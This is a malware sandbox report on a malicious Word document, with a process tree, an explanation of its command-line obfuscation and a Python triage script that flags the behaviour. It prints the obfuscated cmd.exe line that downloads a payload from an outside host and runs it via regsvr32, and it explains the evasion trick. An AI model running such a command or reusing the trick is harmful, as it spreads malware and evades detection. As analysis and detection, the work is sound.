Analysis
max time kernel: 146s
max time network: 23s
platform: windows7_x64
resource: win7v200722
submitted: 31-07-2020 13:03

Static task: static1
Behavioral task: behavioral1 (Sample: legal agreement_07.30.2020.doc; Resource: win7v200722)
Behavioral task: behavioral2 (Sample: legal agreement_07.30.2020.doc; Resource: win10v200722)
General
Target: legal agreement_07.30.2020.doc
Size: 103KB
MD5: b3b0dffa00f1a93dd4f4069d87f43dd3
SHA1: 756fe15d649645f5d9c3ef60dcd6d6ba5384633e
SHA256: e67aa7a4192ca035c6c52a6afaf1b03058b9baa6fde616db3dad9d8d3d4c24cc
SHA512: fe57b509a42cf017bc17d7b84d69ffb9c8de4e7240ef4056caf4e91fda39fee16b0019a4c6fba521f7278d99d857b9ef1374329177a70cc5b6ccc1bf44fd0202
Malware Config
Signatures
Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes: WINWORD.EXE (pid 844)

Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE (pid 844) is not expected to spawn cmd.exe (pid 1036).

An obfuscated cmd.exe command-line is typically used to evade detection. (1 IoC)
  Processes: cmd.exe (pid 1036)

Loads dropped DLL (1 IoC)
  Processes: cmd.exe (pid 1036)

Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

Suspicious use of SetWindowsHookEx (16 IoCs)
  Processes: WINWORD.EXE (pid 844), 16 occurrences

Suspicious use of WriteProcessMemory (6 IoCs)
  Processes:
    PID 844 (WINWORD.EXE) wrote to memory of PID 1036 (cmd.exe), 3 occurrences
    PID 1036 (cmd.exe) wrote to memory of PID 1532 (1.exe), 3 occurrences

Executes dropped EXE (1 IoC)
  Processes: 1.exe (pid 1532)

Office loads VBA resources, possible macro or embedded object present
Processes
1. C:\Program Files\Microsoft Office\Office14\WINWORD.EXE (pid 844)
   "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\legal agreement_07.30.2020.doc"
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\cmd.exe (pid 1036, child of 1)
      "C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://bofzvaxf6.com/bolb/jaent.php?l=liut1.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"
      - Process spawned unexpected child process
      - An obfuscated cmd.exe command-line is typically used to evade detection.
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      3. C:\ProgramData\1.exe (pid 1532, child of 2)
         C:\ProgramData\1.exe /urlcache /f http://bofzvaxf6.com/bolb/jaent.php?l=liut1.cab C:\ProgramData\1.tmp
         - Executes dropped EXE
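Reading the process tree: the cmd.exe argument hides the string "/urlcache" behind a "set u=url" assignment, a "%u%" reference and caret escapes. On the command line an undefined "%u%" is left literal on the first parse, and "call" re-parses the line after "set" has run, so the depth-3 child receives the plain "C:\ProgramData\1.exe /urlcache /f <url> C:\ProgramData\1.tmp"; the second "call" then hands the downloaded 1.tmp to regsvr32. The report does not say what 1.exe is; "/urlcache /f <url> <file>" is the download syntax of certutil.exe, so a renamed certutil copy is an inference, not something the report states. The Python below is an added example, not sandbox output or the report's own detection logic: it replays the three process-creation events above (constructed from the tree; the parent pid of WINWORD.EXE is not on the page and is set to 0) through a minimal cmd deobfuscator and rules matching three of the signatures above (Office parent spawning a shell, obfuscated command line, URL-cache download followed by regsvr32 of a non-.dll file). The OFFICE and SHELLS name sets and the rule names are assumptions of the example.

```python
"""Process-tree triage for the report above (added example, not sandbox output)."""
import json
import re

# Constructed from the report's process tree. WINWORD's own parent is not on
# the page, so its ppid is set to 0 here.
EVENTS = [
    {"pid": 844, "ppid": 0,
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\legal agreement_07.30.2020.doc"'},
    {"pid": 1036, "ppid": 844,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://bofzvaxf6.com/bolb/jaent.php?l=liut1.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"'},
    {"pid": 1532, "ppid": 1036,
     "image": r"C:\ProgramData\1.exe",
     "cmdline": r"C:\ProgramData\1.exe /urlcache /f http://bofzvaxf6.com/bolb/jaent.php?l=liut1.cab C:\ProgramData\1.tmp"},
]

# Assumed name sets for the parent/child rule.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def inner_command(cmdline):
    """Return the text cmd.exe will execute: everything after /c or /k, minus the
    outer quotes cmd strips when the whole argument is quoted (simplified rule)."""
    m = re.search(r"\s/[ck]\s+", cmdline, re.I)
    if not m:
        return cmdline
    body = cmdline[m.end():].strip()
    if len(body) >= 2 and body[0] == '"' and body[-1] == '"':
        body = body[1:-1]
    return body


def strip_carets(text):
    """Remove caret escapes outside double quotes (^x -> x), as cmd's parser does."""
    out, quoted, i = [], False, 0
    while i < len(text):
        ch = text[i]
        if ch == '"':
            quoted = not quoted
        elif ch == "^" and not quoted and i + 1 < len(text):
            i += 1
            ch = text[i]
        out.append(ch)
        i += 1
    return "".join(out)


def expand_set_vars(text):
    """Expand %name% from 'set name=value' assignments in the same command line.
    This models the 'set ... && call ...' trick: 'call' re-parses the line after
    the variable exists, so the literal %name% becomes its value."""
    env = {n.lower(): v for n, v in
           re.findall(r'\bset\s+([A-Za-z_]\w*)=([^&|<>"]*)', text, re.I)}
    return re.sub(r"%([A-Za-z_]\w*)%",
                  lambda m: env.get(m.group(1).lower(), m.group(0)), text)


def deobfuscate(cmdline):
    return expand_set_vars(strip_carets(inner_command(cmdline)))


def triage(events):
    """Return {pid: {image, decoded, hits}} for every event that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in events:
        hits = []
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) in OFFICE and basename(e["image"]) in SHELLS:
            hits.append("office_spawned_shell")
        raw = e["cmdline"]
        clean = deobfuscate(raw)
        # Several carets, or a set/%var% pair on one line, rarely occur in benign use.
        if raw.count("^") >= 3 or (re.search(r"\bset\s+\w+=", raw, re.I) and "%" in raw):
            hits.append("cmdline_obfuscation")
        # certutil-style download switch with a URL (1.exe is assumed, not known, to be certutil).
        if re.search(r"[/-]urlcache\b.*\bhttps?://", clean, re.I):
            hits.append("urlcache_download")
        # regsvr32 pointed at something that is not named .dll (here: 1.tmp).
        if re.search(r"\bregsvr32\b", clean, re.I) and not re.search(r"\bregsvr32\b.*\.dll\b", clean, re.I):
            hits.append("regsvr32_nonstandard_extension")
        if hits:
            findings[e["pid"]] = {"image": basename(e["image"]), "decoded": clean, "hits": hits}
    return findings


if __name__ == "__main__":
    print(json.dumps(triage(EVENTS), indent=2))
```

The deobfuscator only handles the two tricks this sample uses (caret escapes and set/call variable expansion); real cmd parsing has more phases (delayed expansion, nested quotes, for-loop tokens), so treat a decoded line as a triage aid, not as ground truth, and keep the raw command line in the alert.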